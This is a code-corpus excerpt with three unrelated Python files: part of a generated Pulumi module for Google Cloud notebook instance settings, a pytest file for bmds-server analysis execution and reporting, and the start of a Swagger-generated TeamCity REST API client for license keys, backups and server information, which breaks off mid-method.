The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: pulumi.Input[str]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="imageFamily")
def image_family(self) -> Optional[pulumi.Input[str]]:
"""
Use this VM image family to find the image; the newest image in this family will be used.
"""
return pulumi.get(self, "image_family")
@image_family.setter
def image_family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_family", value)
@property
@pulumi.getter(name="imageName")
def image_name(self) -> Optional[pulumi.Input[str]]:
"""
Use VM image name to find the image.
"""
return pulumi.get(self, "image_name")
@image_name.setter
def image_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_name", value)
@pulumi.input_type
class InstanceAcceleratorConfigArgs:
def __init__(__self__, *,
core_count: pulumi.Input[int],
type: pulumi.Input[str]):
"""
:param pulumi.Input[int] core_count: Count of cores of this accelerator.
:param pulumi.Input[str] type: Type of this accelerator.
Possible values are `ACCELERATOR_TYPE_UNSPECIFIED`, `NVIDIA_TESLA_K80`, `NVIDIA_TESLA_P100`, `NVIDIA_TESLA_V100`, `NVIDIA_TESLA_P4`, `NVIDIA_TESLA_T4`, `NVIDIA_TESLA_T4_VWS`, `NVIDIA_TESLA_P100_VWS`, `NVIDIA_TESLA_P4_VWS`, `NVIDIA_TESLA_A100`, `TPU_V2`, and `TPU_V3`.
"""
pulumi.set(__self__, "core_count", core_count)
pulumi.set(__self__, "type", type)
@property
@pulumi.getter(name="coreCount")
def core_count(self) -> pulumi.Input[int]:
"""
Count of cores of this accelerator.
"""
return pulumi.get(self, "core_count")
@core_count.setter
def core_count(self, value: pulumi.Input[int]):
pulumi.set(self, "core_count", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of this accelerator.
Possible values are `ACCELERATOR_TYPE_UNSPECIFIED`, `NVIDIA_TESLA_K80`, `NVIDIA_TESLA_P100`, `NVIDIA_TESLA_V100`, `NVIDIA_TESLA_P4`, `NVIDIA_TESLA_T4`, `NVIDIA_TESLA_T4_VWS`, `NVIDIA_TESLA_P100_VWS`, `NVIDIA_TESLA_P4_VWS`, `NVIDIA_TESLA_A100`, `TPU_V2`, and `TPU_V3`.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@pulumi.input_type
class InstanceContainerImageArgs:
def __init__(__self__, *,
repository: pulumi.Input[str],
tag: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] repository: The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
:param pulumi.Input[str] tag: The tag of the container image. If not specified, this defaults to the latest tag.
"""
pulumi.set(__self__, "repository", repository)
if tag is not None:
pulumi.set(__self__, "tag", tag)
@property
@pulumi.getter
def repository(self) -> pulumi.Input[str]:
"""
The path to the container image repository.
For example: gcr.io/{project_id}/{imageName}
"""
return pulumi.get(self, "repository")
@repository.setter
def repository(self, value: pulumi.Input[str]):
pulumi.set(self, "repository", value)
@property
@pulumi.getter
def tag(self) -> Optional[pulumi.Input[str]]:
"""
The tag of the container image. If not specified, this defaults to the latest tag.
"""
return pulumi.get(self, "tag")
@tag.setter
def tag(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "tag", value)
@pulumi.input_type
class InstanceIamBindingConditionArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
title: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "title", title)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class InstanceIamMemberConditionArgs:
def __init__(__self__, *,
expression: pulumi.Input[str],
title: pulumi.Input[str],
description: Optional[pulumi.Input[str]] = None):
pulumi.set(__self__, "expression", expression)
pulumi.set(__self__, "title", title)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter
def expression(self) -> pulumi.Input[str]:
return pulumi.get(self, "expression")
@expression.setter
def expression(self, value: pulumi.Input[str]):
pulumi.set(self, "expression", value)
@property
@pulumi.getter
def title(self) -> pulumi.Input[str]:
return pulumi.get(self, "title")
@title.setter
def title(self, value: pulumi.Input[str]):
pulumi.set(self, "title", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@pulumi.input_type
class InstanceReservationAffinityArgs:
def __init__(__self__, *,
consume_reservation_type: pulumi.Input[str],
key: Optional[pulumi.Input[str]] = None,
values: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] consume_reservation_type: The type of Compute Reservation.
Possible values are `NO_RESERVATION`, `ANY_RESERVATION`, and `SPECIFIC_RESERVATION`.
:param pulumi.Input[str] key: Corresponds to the label key of reservation resource.
:param pulumi.Input[Sequence[pulumi.Input[str]]] values: Corresponds to the label values of reservation resource.
"""
pulumi.set(__self__, "consume_reservation_type", consume_reservation_type)
if key is not None:
pulumi.set(__self__, "key", key)
if values is not None:
pulumi.set(__self__, "values", values)
@property
@pulumi.getter(name="consumeReservationType")
def consume_reservation_type(self) -> pulumi.Input[str]:
"""
The type of Compute Reservation.
Possible values are `NO_RESERVATION`, `ANY_RESERVATION`, and `SPECIFIC_RESERVATION`.
"""
return pulumi.get(self, "consume_reservation_type")
@consume_reservation_type.setter
def consume_reservation_type(self, value: pulumi.Input[str]):
pulumi.set(self, "consume_reservation_type", value)
@property
@pulumi.getter
def key(self) -> Optional[pulumi.Input[str]]:
"""
Corresponds to the label key of reservation resource.
"""
return pulumi.get(self, "key")
@key.setter
def key(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "key", value)
@property
@pulumi.getter
def values(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
Corresponds to the label values of reservation resource.
"""
return pulumi.get(self, "values")
@values.setter
def values(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "values", value)
@pulumi.input_type
class InstanceShieldedInstanceConfigArgs:
def __init__(__self__, *,
enable_integrity_monitoring: Optional[pulumi.Input[bool]] = None,
enable_secure_boot: Optional[pulumi.Input[bool]] = None,
enable_vtpm: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[bool] enable_integrity_monitoring: Defines whether the instance has integrity monitoring enabled. Enables monitoring and attestation of the
boot integrity of the instance. The attestation is performed against the integrity policy baseline.
This baseline is initially derived from the implicitly trusted boot image when the instance is created.
Enabled by default.
:param pulumi.Input[bool] enable_secure_boot: Defines whether the instance has Secure Boot enabled. Secure Boot helps ensure that the system only runs
authentic software by verifying the digital signature of all boot components, and halting the boot process
if signature verification fails.
Disabled by default.
:param pulumi.Input[bool] enable_vtpm: Defines whether the instance has the vTPM enabled.
Enabled by default.
"""
if enable_integrity_monitoring is not None:
pulumi.set(__self__, "enable_integrity_monitoring", enable_integrity_monitoring)
if enable_secure_boot is not None:
pulumi.set(__self__, "enable_secure_boot", enable_secure_boot)
if enable_vtpm is not None:
pulumi.set(__self__, "enable_vtpm", enable_vtpm)
@property
@pulumi.getter(name="enableIntegrityMonitoring")
def enable_integrity_monitoring(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has integrity monitoring enabled. Enables monitoring and attestation of the
boot integrity of the instance. The attestation is performed against the integrity policy baseline.
This baseline is initially derived from the implicitly trusted boot image when the instance is created.
Enabled by default.
"""
return pulumi.get(self, "enable_integrity_monitoring")
@enable_integrity_monitoring.setter
def enable_integrity_monitoring(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_integrity_monitoring", value)
@property
@pulumi.getter(name="enableSecureBoot")
def enable_secure_boot(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has Secure Boot enabled. Secure Boot helps ensure that the system only runs
authentic software by verifying the digital signature of all boot components, and halting the boot process
if signature verification fails.
Disabled by default.
"""
return pulumi.get(self, "enable_secure_boot")
@enable_secure_boot.setter
def enable_secure_boot(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_secure_boot", value)
@property
@pulumi.getter(name="enableVtpm")
def enable_vtpm(self) -> Optional[pulumi.Input[bool]]:
"""
Defines whether the instance has the vTPM enabled.
Enabled by default.
"""
return pulumi.get(self, "enable_vtpm")
@enable_vtpm.setter
def enable_vtpm(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enable_vtpm", value)
@pulumi.input_type
class InstanceVmImageArgs:
def __init__(__self__, *,
project: pulumi.Input[str],
image_family: Optional[pulumi.Input[str]] = None,
image_name: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] project: The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
:param pulumi.Input[str] image_family: Use this VM image family to find the image; the newest image in this family will be used.
:param pulumi.Input[str] image_name: Use VM image name to find the image.
"""
pulumi.set(__self__, "project", project)
if image_family is not None:
pulumi.set(__self__, "image_family", image_family)
if image_name is not None:
pulumi.set(__self__, "image_name", image_name)
@property
@pulumi.getter
def project(self) -> pulumi.Input[str]:
"""
The name of the Google Cloud project that this VM image belongs to.
Format: projects/{project_id}
"""
return pulumi.get(self, "project")
@project.setter
def project(self, value: pulumi.Input[str]):
pulumi.set(self, "project", value)
@property
@pulumi.getter(name="imageFamily")
def image_family(self) -> Optional[pulumi.Input[str]]:
"""
Use this VM image family to find the image; the newest image in this family will be used.
"""
return pulumi.get(self, "image_family")
@image_family.setter
def image_family(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_family", value)
@property
@pulumi.getter(name="imageName")
def image_name(self) -> Optional[pulumi.Input[str]]:
"""
Use VM image name to find the image.
"""
return pulumi.get(self, "image_name")
@image_name.setter
def image_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "image_name", value)
| avg_line_length: 37.43 | max_line_length: 282 | alphanum_fraction: 0.649 |

| hexsha: 733f40303ceb149e10491befdc3a1091de74aeee | size: 2,959 | ext: py | lang: Python |
| path: tests/analysis/test_models.py |
| repo: shapiromatron/bmds-server @ 0b2b79b521728582fa66100621e9ea03e251f9f1 | licenses: ["MIT"] |
| stars: 1 (2019-07-09T16:42:15Z) | issues: 103 (2016-11-14T15:58:53Z - 2022-03-07T21:01:03Z) | forks: 2 (2017-03-17T20:43:22Z - 2018-01-04T19:15:18Z) |
import pytest
from run3 import RunBmds3
from bmds_server.analysis.models import Analysis
from bmds_server.analysis.reporting.docx import build_docx
from bmds_server.analysis.reporting.excel import build_df
@pytest.mark.django_db()
@pytest.mark.skipif(not RunBmds3.should_run, reason=RunBmds3.skip_reason)
class TestBmds3Execution:
def test_c(self, bmds3_complete_continuous):
analysis = Analysis.objects.create(inputs=bmds3_complete_continuous)
assert analysis.is_finished is False
assert analysis.has_errors is False
analysis.execute()
assert analysis.is_finished is True
assert analysis.has_errors is False
assert analysis.outputs["outputs"][0]["metadata"]["dataset_index"] == 0
assert analysis.outputs["outputs"][0]["metadata"]["option_index"] == 0
assert len(analysis.outputs["outputs"]) == 1
assert len(analysis.outputs["outputs"][0]["frequentist"]["models"]) == 1
assert len(analysis.outputs["outputs"][0]["bayesian"]["models"]) == 1
assert analysis.errors == []
# test reporting (for completion)
build_docx(analysis, "http://bmds-python.com")
build_df(analysis)
def test_ci(self, bmds3_complete_continuous_individual):
analysis = Analysis.objects.create(inputs=bmds3_complete_continuous_individual)
assert analysis.is_finished is False
assert analysis.has_errors is False
analysis.execute()
assert analysis.is_finished is True
assert analysis.has_errors is False
assert analysis.outputs["outputs"][0]["metadata"]["dataset_index"] == 0
assert analysis.outputs["outputs"][0]["metadata"]["option_index"] == 0
assert len(analysis.outputs["outputs"]) == 1
assert len(analysis.outputs["outputs"][0]["frequentist"]["models"]) == 1
assert len(analysis.outputs["outputs"][0]["bayesian"]["models"]) == 1
assert analysis.errors == []
# test reporting (for completion)
build_docx(analysis, "http://bmds-python.com")
build_df(analysis)
def test_d(self, bmds3_complete_dichotomous):
analysis = Analysis.objects.create(inputs=bmds3_complete_dichotomous)
assert analysis.is_finished is False
assert analysis.has_errors is False
analysis.execute()
assert analysis.is_finished is True
assert analysis.has_errors is False
assert analysis.outputs["outputs"][0]["metadata"]["dataset_index"] == 0
assert analysis.outputs["outputs"][0]["metadata"]["option_index"] == 0
assert len(analysis.outputs["outputs"]) == 1
assert len(analysis.outputs["outputs"][0]["frequentist"]["models"]) == 1
assert len(analysis.outputs["outputs"][0]["bayesian"]["models"]) == 1
assert analysis.errors == []
# test reporting (for completion)
build_docx(analysis, "http://bmds-python.com")
build_df(analysis)
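    # The three tests above differ only in their input fixture; a possible
    # dedupe (untested sketch) via pytest's request fixture:
    #
    #     @pytest.mark.parametrize("fixture_name", [
    #         "bmds3_complete_continuous",
    #         "bmds3_complete_continuous_individual",
    #         "bmds3_complete_dichotomous",
    #     ])
    #     def test_execution(self, request, fixture_name):
    #         analysis = Analysis.objects.create(
    #             inputs=request.getfixturevalue(fixture_name))
    #         ...shared assertions...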
| avg_line_length: 39.99 | max_line_length: 87 | alphanum_fraction: 0.677 |

| hexsha: 735f2fa8e1e516522c3120cd285b535fcc686fe2 | size: 66,953 | ext: py | lang: Python |
| path: dohq_teamcity/api/server_api.py |
| repo: DenKoren/teamcity @ 69acb4d1402c316129b4602882a9cce2d55cf926 | licenses: ["MIT"] |
| stars: 23 (2018-10-19T07:28:45Z - 2021-11-12T12:46:09Z) | issues: 31 (2018-10-16T05:53:11Z - 2021-09-09T14:44:14Z) | forks: 12 (2018-10-28T23:00:17Z - 2021-09-07T12:07:13Z) |
# coding: utf-8
"""
TeamCity REST API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2018.1
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
from dohq_teamcity.custom.base_model import TeamCityObject
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from dohq_teamcity.models.backup_process_manager import BackupProcessManager # noqa: F401,E501
from dohq_teamcity.models.file import File # noqa: F401,E501
from dohq_teamcity.models.files import Files # noqa: F401,E501
from dohq_teamcity.models.license_key import LicenseKey # noqa: F401,E501
from dohq_teamcity.models.license_keys import LicenseKeys # noqa: F401,E501
from dohq_teamcity.models.licensing_data import LicensingData # noqa: F401,E501
from dohq_teamcity.models.plugins import Plugins # noqa: F401,E501
from dohq_teamcity.models.server import Server # noqa: F401,E501
class ServerApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
base_name = 'Server'
def __init__(self, api_client=None):
self.api_client = api_client
def add_license_keys(self, **kwargs): # noqa: E501
"""add_license_keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_license_keys(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str body:
:param str fields:
:return: LicenseKeys
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__add_license_keys_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__add_license_keys_with_http_info(**kwargs) # noqa: E501
return data
def delete_license_key(self, license_key, **kwargs): # noqa: E501
"""delete_license_key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_license_key(license_key, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str license_key: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__delete_license_key_with_http_info(license_key, **kwargs) # noqa: E501
else:
(data) = self.__delete_license_key_with_http_info(license_key, **kwargs) # noqa: E501
return data
def get_backup_status(self, **kwargs): # noqa: E501
"""get_backup_status # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_backup_status(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param BackupProcessManager body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_backup_status_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.__get_backup_status_with_http_info(**kwargs) # noqa: E501
return data
def get_children(self, path, area_id, **kwargs): # noqa: E501
"""get_children # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_children(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_children_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
(data) = self.__get_children_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_children_alias(self, path, area_id, **kwargs): # noqa: E501
"""get_children_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_children_alias(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_children_alias_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
(data) = self.__get_children_alias_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_content(self, path, area_id, **kwargs): # noqa: E501
"""get_content # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_content(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str response_builder:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_content_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
            data = self.__get_content_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_content_alias(self, path, area_id, **kwargs): # noqa: E501
"""get_content_alias # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_content_alias(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_content_alias_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
            data = self.__get_content_alias_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_license_key(self, license_key, **kwargs): # noqa: E501
"""get_license_key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_license_key(license_key, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str license_key: (required)
:param str fields:
:return: LicenseKey
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_license_key_with_http_info(license_key, **kwargs) # noqa: E501
else:
            data = self.__get_license_key_with_http_info(license_key, **kwargs) # noqa: E501
return data
def get_license_keys(self, **kwargs): # noqa: E501
"""get_license_keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_license_keys(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str fields:
:return: LicenseKeys
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_license_keys_with_http_info(**kwargs) # noqa: E501
else:
            data = self.__get_license_keys_with_http_info(**kwargs) # noqa: E501
return data
def get_licensing_data(self, **kwargs): # noqa: E501
"""get_licensing_data # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_licensing_data(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str fields:
:return: LicensingData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_licensing_data_with_http_info(**kwargs) # noqa: E501
else:
            data = self.__get_licensing_data_with_http_info(**kwargs) # noqa: E501
return data
def get_metadata(self, path, area_id, **kwargs): # noqa: E501
"""get_metadata # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_metadata(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str fields:
:return: File
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_metadata_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
            data = self.__get_metadata_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def get_root(self, area_id, **kwargs): # noqa: E501
"""get_root # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_root(area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str fields:
:return: Files
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_root_with_http_info(area_id, **kwargs) # noqa: E501
else:
            data = self.__get_root_with_http_info(area_id, **kwargs) # noqa: E501
return data
def get_zipped(self, path, area_id, **kwargs): # noqa: E501
"""get_zipped # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_zipped(path, area_id, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str path: (required)
:param str area_id: (required)
:param str base_path:
:param str locator:
:param str name:
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__get_zipped_with_http_info(path, area_id, **kwargs) # noqa: E501
else:
            data = self.__get_zipped_with_http_info(path, area_id, **kwargs) # noqa: E501
return data
def serve_plugins(self, **kwargs): # noqa: E501
"""serve_plugins # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_plugins(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str fields:
:return: Plugins
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_plugins_with_http_info(**kwargs) # noqa: E501
else:
            data = self.__serve_plugins_with_http_info(**kwargs) # noqa: E501
return data
def serve_server_info(self, **kwargs): # noqa: E501
"""serve_server_info # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_server_info(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str fields:
:return: Server
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_server_info_with_http_info(**kwargs) # noqa: E501
else:
            data = self.__serve_server_info_with_http_info(**kwargs) # noqa: E501
return data
def serve_server_version(self, field, **kwargs): # noqa: E501
"""serve_server_version # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.serve_server_version(field, async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str field: (required)
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__serve_server_version_with_http_info(field, **kwargs) # noqa: E501
else:
            data = self.__serve_server_version_with_http_info(field, **kwargs) # noqa: E501
return data
def start_backup(self, **kwargs): # noqa: E501
"""start_backup # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.start_backup(async_req=True)
>>> result = thread.get()
:param async_req: bool
:param str file_name:
:param bool add_timestamp:
:param bool include_configs:
:param bool include_database:
:param bool include_build_logs:
:param bool include_personal_changes:
:param bool include_running_builds:
:param bool include_supplimentary_data:
:param BackupProcessManager body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.__start_backup_with_http_info(**kwargs) # noqa: E501
else:
            data = self.__start_backup_with_http_info(**kwargs) # noqa: E501
return data
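    # Illustrative usage sketch for the sync/async pattern shared by the public
    # methods above. This is not part of the generated client; the client class
    # and constructor shown here are assumptions for the example:
    #
    #   api = ServerApi(api_client)
    #   keys = api.get_license_keys()                  # synchronous: returns LicenseKeys
    #   thread = api.get_license_keys(async_req=True)  # asynchronous: returns a thread
    #   keys = thread.get()                            # block until the result is ready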
def __add_license_keys_with_http_info(self, **kwargs): # noqa: E501
"""add_license_keys # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__add_license_keys_with_http_info(async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str body:
:param str fields:
:return: LicenseKeys
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'fields'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_license_keys" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'fields' in params:
query_params.append(('fields', params['fields'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData/licenseKeys', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='LicenseKeys', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __delete_license_key_with_http_info(self, license_key, **kwargs): # noqa: E501
"""delete_license_key # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__delete_license_key_with_http_info(license_key, async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param str license_key: (required)
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['license_key'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_license_key" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'license_key' is set
if ('license_key' not in params or
params['license_key'] is None):
raise ValueError("Missing the required parameter `license_key` when calling `delete_license_key`") # noqa: E501
collection_formats = {}
path_params = {}
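        # Path parameters accept either a plain string or a TeamCityObject,
        # in which case its locator_id is substituted into the URL (this
        # pattern recurs in the other *_with_http_info methods below).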
if 'license_key' in params:
if isinstance(params['license_key'], TeamCityObject):
path_params['licenseKey'] = params['license_key'].locator_id
else:
path_params['licenseKey'] = params['license_key'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/licensingData/licenseKeys/{licenseKey}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_backup_status_with_http_info(self, **kwargs): # noqa: E501
"""get_backup_status # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.__get_backup_status_with_http_info(async_req=True)
>>> result = thread.get()
        :param async_req: bool
:param BackupProcessManager body:
:return: str
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_backup_status" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# Authentication setting
auth_settings = [] # noqa: E501
return self.api_client.call_api(
'/app/rest/server/backup', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='str', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def __get_children_with_http_info(self, path, area_id, **kwargs): # noqa: E501
"""get_children # noqa: E501
This method makes a synchronous HTTP request by default. To make an
